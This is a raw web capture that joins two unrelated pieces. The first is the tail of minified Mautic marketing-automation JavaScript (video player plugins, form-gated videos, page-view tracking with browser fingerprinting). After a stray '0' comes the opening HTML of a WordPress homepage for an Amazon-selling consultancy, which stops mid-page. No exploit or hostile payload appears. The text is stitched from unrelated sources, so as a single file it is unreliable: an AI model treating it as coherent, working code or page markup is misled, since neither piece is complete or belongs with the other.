b=a(this),c=parseInt(b.data("itemindex"),10),e=d.options.contextMenuItems[c];"undefined"!=typeof e.show&&e.show(b,d),b.click(function(){"undefined"!=typeof e.click&&e.click(d),d.contextMenu.hide()})}),setTimeout(function(){d.killControlsTimer("rev3")},100)}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{skipBackInterval:30,skipBackText:mejs.i18n.t("Skip back %1 seconds")}),a.extend(MediaElementPlayer.prototype,{buildskipback:function(b,c,d,e){var f=this,g=f.options.skipBackText.replace("%1",f.options.skipBackInterval);a('<div class="mejs-button mejs-skip-back-button"><button type="button" aria-controls="'+f.id+'" title="'+g+'" aria-label="'+g+'">'+f.options.skipBackInterval+"</button></div>").appendTo(c).click(function(){e.setCurrentTime(Math.max(e.currentTime-f.options.skipBackInterval,0)),a(this).find("button").blur()})}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{postrollCloseText:mejs.i18n.t("Close")}),a.extend(MediaElementPlayer.prototype,{buildpostroll:function(b,c,d,e){var f=this,g=f.container.find('link[rel="postroll"]').attr("href");"undefined"!=typeof g&&(b.postroll=a('<div class="mejs-postroll-layer mejs-layer"><a class="mejs-postroll-close" onclick="$(this).parent().hide();return false;">'+f.options.postrollCloseText+'</a><div class="mejs-postroll-layer-content"></div></div>').prependTo(d).hide(),f.media.addEventListener("ended",function(c){a.ajax({dataType:"html",url:g,success:function(a,b){d.find(".mejs-postroll-layer-content").html(a)}}),b.postroll.show()},!1))}})}(mejs.$);MauticJS.processGatedVideos(MauticJS.videoElements);}};MauticJS.processGatedVideos=function(videoElements){window.mediaPlayers=[];window.setInterval(function(e){MauticJS.iterateCollection(mediaPlayers)(function(node,i){if(mediaPlayers[i].views){MauticJS.iterateCollection(mediaPlayers[i].views)(function(nodeA,iA){if(!node.views[iA].sent){MauticJS.makeCORSRequest('POST','https://mautic2018.easyredmine.com/video/hit',node.views[iA],function(data){if(data.success&&node.views[iA].locked){node.views[iA].sent=true;}});}});}});},3000);MauticJS.addVideoView=function(i,totalWatched){if(totalWatched==0){return;} var viewId=mediaPlayers[i].views.length;var view={guid:MauticJS.guid(),locked:false,duration:mediaPlayers[i].mediaElement.duration,url:mediaPlayers[i].mediaElement.src};MauticJS.iterateCollection(mediaPlayers[i].views)(function(node,j){if(mediaPlayers[i].views[j].locked==false){viewId=j;view=mediaPlayers[i].views[j];}});view.total_watched=totalWatched;mediaPlayers[i].views[viewId]=view;};MauticJS.endCurrentView=function(i){var viewId=0;MauticJS.iterateCollection(mediaPlayers[i].views)(function(node,j){if(mediaPlayers[i].views[j].locked==false){viewId=j;}});mediaPlayers[i].views[viewId].locked=true;};MauticJS.iterateCollection(videoElements)(function(node,i){var playerFeatures=[];var source=node.getElementsByTagName('source')[0];if(source.type==='video/mp4'){node.dataset.mp4=true;playerFeatures=['playpause','progress','current','duration','volume','fullscreen'];} if(!node.id){node.id='mautic-player-'+i;} mediaPlayers[i]=[];if(node.dataset.formId){var cookieName='mautic-player-'+i+'-'+node.dataset.formId;MauticJS.makeCORSRequest('GET','https://mautic2018.easyredmine.com/form/embed/'+node.dataset.formId,{},function(data){mediaPlayers[i].formHtml=data;});}else{mediaPlayers[i].formHtml='';} if(!node.dataset.formId&&!node.dataset.mauticVideo){return;} mediaPlayers[i].player=new MediaElementPlayer('#'+node.id,{features:playerFeatures,alwaysShowControls:true,enableKeyboard:false,success:function(mediaElement,domElement){mediaPlayers[i].inPoster=false;mediaPlayers[i].success=false;mediaPlayers[i].views=[];mediaPlayers[i].mediaElement=mediaElement;if(!node.dataset.mp4){node.parentElement.parentElement.parentElement.className+=' no-controls';} var iframes=node.parentElement.getElementsByTagName('iframe');if(iframes){MauticJS.iterateCollection(iframes)(function(node,i){node.setAttribute('tabindex',-1);});} mediaElement.addEventListener('ended',function(e){MauticJS.endCurrentView(i);});mediaElement.addEventListener('timeupdate',function(e){var currentTime=0;if('Event'==e.constructor.name){currentTime=e.srcElement.currentTime;}else{currentTime=e.currentTime;} MauticJS.addVideoView(i,currentTime);if(node.dataset.formId&&document.cookie.indexOf(cookieName)==-1&&currentTime>=node.dataset.gateTime&&mediaPlayers[i].inPoster===false&&mediaPlayers[i].success===false){if(document.activeElement.tagName=='IFRAME'){window.mejs.previousActiveElement=document.activeElement;document.activeElement.blur();} mediaPlayers[i].inPoster=true;mediaPlayers[i].player.pause();mediaPlayers[i].poster=document.getElementById(node.id).parentElement.parentElement.getElementsByClassName('mejs-poster')[0];mediaPlayers[i].poster.innerHTML=mediaPlayers[i].formHtml;mediaPlayers[i].poster.style.display='block';mediaPlayers[i].form=mediaPlayers[i].poster.getElementsByTagName('form')[0];mediaPlayers[i].form.className+=' mautic-gated-video-style';mediaPlayers[i].form.addEventListener('submit',function(e){e.preventDefault();MauticJS.makeCORSRequest('POST','https://mautic2018.easyredmine.com/form/submit/ajax?formId='+node.dataset.formId,jQuery(mediaPlayers[i].form).serialize(),function(data){if(data.success){mediaPlayers[i].success=true;if(!data.message){mediaPlayers[i].poster.style.display='none';mediaPlayers[i].player.play();window.mejs.previousActiveElement.focus();} document.cookie=cookieName+"=true; max-age="+60*60*24*7;} if(data.message){var position=parseInt(mediaPlayers[i].poster.style.height)/1.4;mediaPlayers[i].poster.innerHTML='<p style="padding:20px;padding-top:'+position+'px;" class="mautic-response">'+data.message+'</p>';setTimeout(function(){mediaPlayers[i].poster.style.display='none';mediaPlayers[i].player.play();if(window.mejs.previousActiveElement&&window.mejs.previousActiveElement.tagName=='IFRAME'){window.mejs.previousActiveElement.focus();}},3000);}else if(data.validationErrors){jQuery('#mauticform_'+data.formName+' .mauticform-errormsg').css('display','none');jQuery.each(data.validationErrors,function(field,message){if(jQuery('#mauticform_'+data.formName+'_'+field+' .mauticform-errormsg')){jQuery('#mauticform_'+data.formName+'_'+field+' .mauticform-errormsg').css('display','block');}});}});return false;});}});}});if(node.autoplay){mediaPlayers[i].player.play();}});} MauticJS.documentReady(MauticJS.initGatedVideo);MauticJS.mtcEventSet=false;document.addEventListener('mauticPageEventDelivered',function(e){var detail=e.detail;if(!MauticJS.mtcEventSet&&detail.response&&detail.response.events){MauticJS.setTrackedEvents(detail.response.events);}});MauticJS.setTrackedEvents=function(events){MauticJS.mtcEventSet=true;if(typeof fbq!=='undefined'&&typeof events.facebook_pixel!=='undefined'){var e=events.facebook_pixel;for(var i=0;i<e.length;i++){if(typeof e[i]['action']!=='undefined'&&typeof e[i]['label']!=='undefined') fbq('trackCustom',e[i]['action'],{eventLabel:e[i]['label']});}} if(typeof ga!=='undefined'&&typeof events.google_analytics!=='undefined'){var e=events.google_analytics;for(var i=0;i<e.length;i++){if(typeof e[i]['action']!=='undefined'&&typeof e[i]['label']!=='undefined') ga('send',{hitType:'event',eventCategory:e[i]['category'],eventAction:e[i]['action'],eventLabel:e[i]['label'],});}} if(typeof events.focus_item!=='undefined'){var e=events.focus_item;for(var i=0;i<e.length;i++){if(typeof e[i]['id']!=='undefined'&&typeof e[i]['js']!=='undefined'){MauticJS.insertScript(e[i]['js']);}}}};(function(m,l,n,d){m.pageTrackingUrl=(l.protocol=='https:'?'https:':'https:')+'//mautic2018.easyredmine.com/mtracking.gif';m.pageTrackingCORSUrl=(l.protocol=='https:'?'https:':'https:')+'//mautic2018.easyredmine.com/mtc/event';m.contactIdUrl=(l.protocol=='https:'?'https:':'https:')+'//mautic2018.easyredmine.com/mtc';m.fingerprint=null;m.fingerprintComponents=null;m.fingerprintIsLoading=false;m.addFingerprint=function(params){for(var componentId in m.fingerprintComponents){var component=m.fingerprintComponents[componentId];if(typeof component.key!=='undefined'){if(component.key==='resolution'){params.resolution=component.value[0]+'x'+component.value[1];}else if(component.key==='timezone_offset'){params.timezone_offset=component.value;}else if(component.key==='navigator_platform'){params.platform=component.value;}else if(component.key==='adblock'){params.adblock=component.value;}else if(component.key==='do_not_track'){params.do_not_track=component.value;}}} params.fingerprint=m.fingerprint;return params;} m.deliverPageEvent=function(event,params){if(!m.firstDeliveryMade&&params['counter']>0){setTimeout(function(){m.deliverPageEvent(event,params);},5);return;} if(m.fingerprintComponents){params=m.addFingerprint(params);} if(m.preEventDeliveryQueue.length&&m.beforeFirstDeliveryMade===false){for(var i=0;i<m.preEventDeliveryQueue.length;i++){m.preEventDeliveryQueue[i](params);} params=m.appendTrackedContact(params);m.beforeFirstDeliveryMade=true;} MauticJS.makeCORSRequest('POST',m.pageTrackingCORSUrl,params,function(response){MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':event,'params':params,'response':response});},function(){m.buildTrackingImage(event,params);m.firstDeliveryMade=true;});} m.buildTrackingImage=function(pageview,params){delete m.trackingPixel;m.trackingPixel=new Image();if(typeof pageview[3]==='object'){var events=['onabort','onerror','onload'];for(var i=0;i<events.length;i++){var e=events[i];if(typeof pageview[3][e]==='function'){m.trackingPixel[e]=pageview[3][e];}}} m.trackingPixel.onload=function(e){MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':pageview,'params':params,'image':true});};m.trackingPixel.src=m.pageTrackingUrl+'?'+m.serialize(params);} m.pageViewCounter=0;m.sendPageview=function(pageview){var queue=[];if(!pageview){if(typeof m.getInput==='function'){queue=m.getInput('send','pageview');}else{return false;}}else{queue.push(pageview);} if(queue){for(var i=0;i<queue.length;i++){var event=queue[i];var params={page_title:d.title,page_language:n.language,page_referrer:(d.referrer)?d.referrer.split('/')[2]:'',page_url:l.href,counter:m.pageViewCounter};params=MauticJS.appendTrackedContact(params);if(typeof event[2]==='object'){for(var attr in event[2]){params[attr]=event[2][attr];}} m.handleFingerprintInit(event,params);m.pageViewCounter++;}}} m.handleFingerprintInit=function(event,params){if(m.fingerprintComponents){m.deliverPageEvent(event,params);}else if(!m.fingerprint&&m.fingerprintIsLoading===false){m.fingerprintIsLoading=true;new Fingerprint2().get(function(result,components){m.fingerprintIsLoading=false;m.fingerprint=result;m.fingerprintComponents=components;m.deliverPageEvent(event,params);});}else if(m.fingerprintIsLoading===true){var fingerprintLoop=window.setInterval(function(){if(m.fingerprintIsLoading===false){m.deliverPageEvent(event,params);clearInterval(fingerprintLoop);}},5);}else{m.deliverPageEvent(event,params);}} m.sendPageview();document.addEventListener('eventAddedToMauticQueue',function(e){m.sendPageview(e.detail);});})(MauticJS,location,navigator,document);if(typeof MauticDomain=='undefined'){var MauticDomain='https://mautic2018.easyredmine.com';} if(typeof MauticLang=='undefined'){var MauticLang={'submittingMessage':"Please wait..."};} MauticJS.replaceDynamicContent=function(params){params=params||{};var dynamicContentSlots=document.querySelectorAll('.mautic-slot, [data-slot="dwc"]');if(dynamicContentSlots.length){MauticJS.iterateCollection(dynamicContentSlots)(function(node,i){var slotName=node.dataset['slotName'];if('undefined'===typeof slotName){slotName=node.dataset['paramSlotName'];} if('undefined'===typeof slotName){node.innerHTML='';return;} var url='https://mautic2018.easyredmine.com/dwc/slotNamePlaceholder'.replace('slotNamePlaceholder',slotName);MauticJS.makeCORSRequest('GET',url,params,function(response,xhr){if(response.content){var dwcContent=response.content;node.innerHTML=dwcContent;if(response.id&&response.sid){MauticJS.setTrackedContact(response);} if(dwcContent.search("mauticform_wrapper")>0){if(typeof MauticSDK=='undefined'){MauticJS.insertScript('https://mautic2018.easyredmine.com/media/js/mautic-form.js');var fileInterval=setInterval(function(){if(typeof MauticSDK!='undefined'){MauticSDK.onLoad();clearInterval(fileInterval);}},100);}else{MauticSDK.onLoad();}} var m;var regEx=/<script[^>]+src="?([^"\s]+)"?\s/g;while(m=regEx.exec(dwcContent)){if((m[1]).search("/focus/")>0){MauticJS.insertScript(m[1]);}} if(dwcContent.search("fr-gatedvideo")>0){MauticJS.initGatedVideo();}}});});}};MauticJS.beforeFirstEventDelivery(MauticJS.replaceDynamicContent);
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="pingback" href="https://boutiqueseller.com/xmlrpc.php" /> <script type="text/javascript"> document.documentElement.className = 'js'; </script> <script>var et_site_url='https://boutiqueseller.com';var et_post_id='6';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>Boutique Seller | The #1 Seller Experts Period</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Boutique Seller &raquo; Feed" href="https://boutiqueseller.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Boutique Seller &raquo; Comments Feed" href="https://boutiqueseller.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/boutiqueseller.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <meta content="Divi v.3.13.1" name="generator"/><style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='crp-main-front-style-css' href='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/css/crp-main-front.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='crp-tc-buttons-css' href='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/css/crp-tc-buttons.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='crp-tiled-layer-css' href='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/css/crp-tiled-layer.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='crp-font-awesome-css' href='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/css/fontawesome/font-awesome.css?ver=4.9.8' type='text/css' media='all' /> <link rel='stylesheet' id='divi-fonts-css' href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='divi-style-css' href='https://boutiqueseller.com/wp-content/themes/Divi/style.css?ver=3.13.1' type='text/css' media='all' /> <link rel='stylesheet' id='et-builder-googlefonts-cached-css' href='https://fonts.googleapis.com/css?family=Montserrat%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&#038;ver=4.9.8#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://boutiqueseller.com/wp-includes/css/dashicons.min.css?ver=4.9.8' type='text/css' media='all' /> <script type='text/javascript' src='https://boutiqueseller.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/js/crp-main-front.js?ver=4.9.8'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/js/crp-helper.js?ver=4.9.8'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/js/jquery/jquery.modernizr.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/js/crp-tiled-layer.js?ver=4.9.8'></script> <script type='text/javascript' src='https://boutiqueseller.com/wp-content/plugins/portfolio-wp/js/crp-fs-viewer.js?ver=4.9.8'></script> <link rel='https://api.w.org/' href='https://boutiqueseller.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://boutiqueseller.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://boutiqueseller.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.8" /> <link rel="canonical" href="https://boutiqueseller.com/" /> <link rel='shortlink' href='https://boutiqueseller.com/' /> <link rel="alternate" type="application/json+oembed" href="https://boutiqueseller.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fboutiqueseller.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://boutiqueseller.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fboutiqueseller.com%2F&#038;format=xml" /> <style type="text/css" id="et-bloom-custom-css"> .et_bloom .et_bloom_optin_1 .et_bloom_form_content { background-color: #e85a34 !important; } .et_bloom .et_bloom_optin_1 .et_bloom_form_container .et_bloom_form_header { background-color: #ffffff !important; } .et_bloom .et_bloom_optin_1 .et_bloom_form_container { background-color: #ffffff !important; } .et_bloom .et_bloom_optin_1 .et_bloom_form_content button { background-color: #a33112 !important; } .et_bloom .et_bloom_optin_1 .et_bloom_form_content .et_bloom_fields i { color: #a33112 !important; } .et_bloom .et_bloom_optin_1 .et_bloom_form_content .et_bloom_custom_field_radio i:before { background: #a33112 !important; } .et_bloom .et_bloom_optin_1 .et_bloom_border_dashed .et_bloom_form_container_wrapper { border-color: #3bbc66 !important } .et_bloom .et_bloom_optin_1 .et_bloom_form_content button { background-color: #a33112 !important; } .et_bloom .et_bloom_optin_1 .et_bloom_form_container h2, .et_bloom .et_bloom_optin_1 .et_bloom_form_container h2 span, .et_bloom .et_bloom_optin_1 .et_bloom_form_container h2 strong { font-family: "Open Sans", Helvetica, Arial, Lucida, sans-serif; }.et_bloom .et_bloom_optin_1 .et_bloom_form_container p, .et_bloom .et_bloom_optin_1 .et_bloom_form_container p span, .et_bloom .et_bloom_optin_1 .et_bloom_form_container p strong, .et_bloom .et_bloom_optin_1 .et_bloom_form_container form input, .et_bloom .et_bloom_optin_1 .et_bloom_form_container form button span { font-family: "Open Sans", Helvetica, Arial, Lucida, sans-serif; } </style><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><link rel="shortcut icon" href="https://boutiqueseller.com/wp-content/uploads/2018/08/favicon-boutique-1.png" /><link rel="stylesheet" id="et-core-unified-cached-inline-styles" href="https://boutiqueseller.com/wp-content/cache/et/6/et-core-unified-15468992847814.min.css" onerror="et_core_page_resource_fallback(this, true)" onload="et_core_page_resource_fallback(this)" /></head> <body class="home page-template-default page page-id-6 et_bloom et_pb_button_helper_class et_fixed_nav et_show_nav et_cover_background et_pb_gutter et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns4 et_header_style_left et_pb_pagebuilder_layout et_right_sidebar et_divi_theme et-db et_minified_js et_minified_css"> <div id="page-container"> <header id="main-header" data-height-onload="66"> <div class="container clearfix et_menu_container"> <div class="logo_container"> <span class="logo_helper"></span> <a href="https://boutiqueseller.com/"> <img src="https://boutiqueseller.com/wp-content/uploads/2018/08/bs_logo_vertical_small.png" alt="Boutique Seller" id="logo" data-height-percentage="54" /> </a> </div> <div id="et-top-navigation" data-height="66" data-fixed-height="40"> <nav id="top-menu-nav"> <ul id="top-menu" class="nav"><li id="menu-item-106" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-106"><a href="https://boutiqueseller.com/ppc/">PPC</a></li> <li id="menu-item-98" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-98"><a href="#inventor">Inventor</a></li> <li id="menu-item-352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-352"><a href="https://boutiqueseller.com/consulting/">Consulting</a></li> <li id="menu-item-353" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-353"><a href="https://boutiqueseller.com/photo-video/">Photo &#038; Video</a></li> <li id="menu-item-51" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-51"><a href="tel:732-523-1102"><span class="header-phone-text">Interested in learning more? Call </span><span class="header-phone">732-523-1102</span></a></li> </ul> </nav> <div id="et_mobile_nav_menu"> <div class="mobile_nav closed"> <span class="select_page">Select Page</span> <span class="mobile_menu_bar mobile_menu_bar_toggle"></span> </div> </div> </div> <!-- #et-top-navigation --> </div> <!-- .container --> <div class="et_search_outer"> <div class="container et_search_form_container"> <form role="search" method="get" class="et-search-form" action="https://boutiqueseller.com/"> <input type="search" class="et-search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </form> <span class="et_close_search_field"></span> </div> </div> </header> <!-- #main-header --> <div id="et-main-area"> <div id="main-content"> <article id="post-6" class="post-6 page type-page status-publish hentry"> <div class="entry-content"> <div id="et-boc" class="et-boc"> <div class="et_builder_inner_content et_pb_gutters3"> <div class="et_pb_section et_pb_section_0 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_0"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_0 et_animated et_pb_bg_layout_dark et_pb_text_align_center"> <div class="et_pb_text_inner"> <h2><span style="color: rgba(255, 255, 255, 0.890196);">Manage <strong>Amazon</strong> Selling The Boutique Way</span></h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_0 et_animated et_pb_bg_layout_light" href="#contact">Start a conversation with our ceo</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_1 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_1"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_1 et_animated et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> <h2 style="font-size: 28px;">we help companies run their  <span style="text-decoration: line-through;">amazon</span> businesses</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_divider et_pb_divider_0 et_animated et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_text et_pb_text_2 et_animated et_pb_bg_layout_light et_pb_text_align_center"> <div class="et_pb_text_inner"> Selling on Amazon used to just mean &#8220;selling on Amazon&#8221;. That&#8217;s not the case any more though. If you sell on Amazon it means that you&#8217;re actually running a complex business. You need a partner that can help you fill in the gaps so that you can focus on beating the competition. </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_2"> <div class="et_pb_column et_pb_column_1_4 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_0 et_animated et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="#ppc"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_top" style="color: #898989;">&#xe0f3;</span></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="#ppc">Amazon PPC</a></h4> <div class="et_pb_blurb_description"> Amazon Ads are our bread and butter. We have the expertise and offer white glove service so you can sell more with lower monthly ACOS. </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_1 et_animated et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="#inventor"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_top" style="color: #898989;">&#xe07c;</span></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="#inventor">Private Label Selling</a></h4> <div class="et_pb_blurb_description"> Are you a product inventor? Are you struggling to sell on Amazon? Let us get your product listed and selling on Amazon! </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_2 et_animated et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="/consulting"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_top" style="color: #898989;">&#x77;</span></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="/consulting">Amazon Consulting</a></h4> <div class="et_pb_blurb_description"> Looking to grow or scale your business? Our consultants have helped countless of other sellers kick their sales into high gear. </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_blurb et_pb_blurb_3 et_animated et_pb_bg_layout_light et_pb_text_align_left et_pb_blurb_position_left"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="/photo-video"><span class="et_pb_image_wrap"><span class="et-pb-icon et-waypoint et_pb_animation_top" style="color: #898989;">&#xe006;</span></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="/photo-video">Photography &amp; Video</a></h4> <div class="et_pb_blurb_description"> Our studio provides word class product photos and videos that will engage your customers and help convince them to buy from you. </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_3"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_6 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_button_module_wrapper et_pb_button_1_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_1 et_animated et_pb_bg_layout_light" href="/ppc">Get a free account audit</a> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_2 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_4"> <div class="et_pb_column et_pb_column_1_4 et_pb_column_7 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_number_counter et_pb_number_counter_0 et_pb_bg_layout_light et_pb_text_align_center et_pb_with_title" data-number-value="50" data-number-separator=""> <div class="percent" ><p><span class="percent-value"></span></p></div> <h3 class="title">Average Monthly New Clients</h3> </div><!-- .et_pb_number_counter --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_8 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_number_counter et_pb_number_counter_1 et_pb_bg_layout_light et_pb_text_align_center et_pb_with_title" data-number-value="10" data-number-separator=""> <div class="percent" ><p><span class="percent-value"></span></p></div> <h3 class="title">Vetted Partners</h3> </div><!-- .et_pb_number_counter --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_9 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_number_counter et_pb_number_counter_2 et_pb_bg_layout_light et_pb_text_align_center et_pb_with_title" data-number-value="350" data-number-separator=""> <div class="percent" ><p><span class="percent-value"></span></p></div> <h3 class="title">Record Percent Sales Increase</h3> </div><!-- .et_pb_number_counter --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_10 et_pb_css_mix_blend_mode_passthrough et-last-child"> 